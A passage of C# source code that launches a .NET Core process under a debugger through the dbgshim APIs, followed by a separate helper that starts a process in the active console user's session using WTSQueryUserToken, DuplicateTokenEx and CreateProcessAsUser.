NativeMethods.CreateProcess(info.HostFilename ?? string.Empty, cmdline, IntPtr.Zero, IntPtr.Zero, inheritHandles, dwCreationFlags, env, options.CurrentDirectory, ref si, out pi); hThread = pi.hThread; if (!b) { throw new Exception(string.Format("Could not execute '{0}'", options.Filename)); } int hr = dbgShimState.GetStartupNotificationEvent(pi.dwProcessId, out startupEvent); if (hr < 0) { throw new Exception(string.Format("GetStartupNotificationEvent failed: 0x{0:X8}", hr)); } NativeMethods.ResumeThread(hThread); const uint WAIT_MS = 5000; for (;;) { uint res = NativeMethods.WaitForSingleObject(startupEvent, WAIT_MS); if (res == 0) { break; } if (res == NativeMethods.WAIT_FAILED) { throw new Exception(string.Format("Error waiting for startup event: 0x{0:X8}", Marshal.GetLastWin32Error())); } if (res == NativeMethods.WAIT_TIMEOUT) { if (keepWaiting()) { continue; } throw new TimeoutException("Waiting for CoreCLR timed out. Debug 32-bit .NET Core apps with 32-bit dnSpy (dnSpy-x86.exe), and 64-bit .NET Core apps with 64-bit dnSpy (dnSpy.exe)."); } Debug.Fail(string.Format("Unknown result from WaitForMultipleObjects: 0x{0:X8}", res)); throw new Exception("Error waiting for startup event"); } hr = dbgShimState.EnumerateCLRs(pi.dwProcessId, out pHandleArray, out pStringArray, out dwArrayLength); if (hr < 0 || dwArrayLength == 0) { throw new Exception("Process started but no CoreCLR found"); } var psa = (IntPtr *)pStringArray; var pha = (IntPtr *)pHandleArray; const int index = 0; var version = GetVersionStringFromModule(dbgShimState, pi.dwProcessId, psa[index], out string coreclrFilename); hr = dbgShimState.CreateDebuggingInterfaceFromVersionEx(CorDebugInterfaceVersion.CorDebugVersion_4_0, version, out object obj); var corDebug = obj as ICorDebug; if (corDebug == null) { throw new Exception(string.Format("Could not create a ICorDebug: hr=0x{0:X8}", hr)); } var dbg = createDnDebugger(corDebug, coreclrFilename, pi.dwProcessId, version); for (uint i = 0; i < dwArrayLength; i++) { NativeMethods.SetEvent(pha[i]); } calledSetEvent = true; error = false; return(dbg); } finally { if (!calledSetEvent && pHandleArray != IntPtr.Zero && dwArrayLength != 0) { var pha = (IntPtr *)pHandleArray; for (uint i = 0; i < dwArrayLength; i++) { NativeMethods.SetEvent(pha[i]); } } if (startupEvent != IntPtr.Zero) { NativeMethods.CloseHandle(startupEvent); } if (hThread != IntPtr.Zero) { NativeMethods.CloseHandle(hThread); } if (pHandleArray != IntPtr.Zero) { dbgShimState.CloseCLREnumeration(pHandleArray, pStringArray, dwArrayLength); } if (error) { NativeMethods.TerminateProcess(pi.hProcess, uint.MaxValue); } if (pi.hProcess != IntPtr.Zero) { NativeMethods.CloseHandle(pi.hProcess); } } }
private static Process StartAsUser(ProcessStartInfo startInfo) { var hToken = WindowsIdentity.GetCurrent().Token; var hDupedToken = IntPtr.Zero; var pi = new PROCESS_INFORMATION(); var sa = new SECURITY_ATTRIBUTES(); sa.Length = Marshal.SizeOf(sa); var si = new STARTUPINFO(); si.cb = Marshal.SizeOf(si); var dwSessionID = WTSGetActiveConsoleSessionId(); if (WTSQueryUserToken(dwSessionID, out hToken) == false) { var ex = new Exception("WTSQueryUserToken failure"); IU.Debugger.WriteLine(ex.Message); throw ex; } var dupState = DuplicateTokenEx( hToken, GENERIC_ALL_ACCESS, ref sa, (int)SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, (int)TOKEN_TYPE.TokenPrimary, ref hDupedToken ); if (dupState == false) { var ex = new Exception("DuplicateTokenEx failure"); IU.Debugger.WriteLine(ex.Message); throw ex; } var lpEnvironment = IntPtr.Zero; if (CreateEnvironmentBlock(out lpEnvironment, hDupedToken, false) == false) { var ex = new Exception("CreateEnvironmentBlock failure"); IU.Debugger.WriteLine(ex.Message); throw ex; } var result = CreateProcessAsUser( hDupedToken, startInfo.FileName, startInfo.Arguments, ref sa, ref sa, false, 0, IntPtr.Zero, startInfo.WorkingDirectory, ref si, ref pi); if (!result) { var ex = new Exception("CreateProcessAsUser failure"); IU.Debugger.WriteLine(ex.Message); throw ex; } if (pi.hProcess != IntPtr.Zero) { CloseHandle(pi.hProcess); } if (pi.hThread != IntPtr.Zero) { CloseHandle(pi.hThread); } if (hDupedToken != IntPtr.Zero) { CloseHandle(hDupedToken); } return(Process.GetProcessById(pi.dwProcessID)); }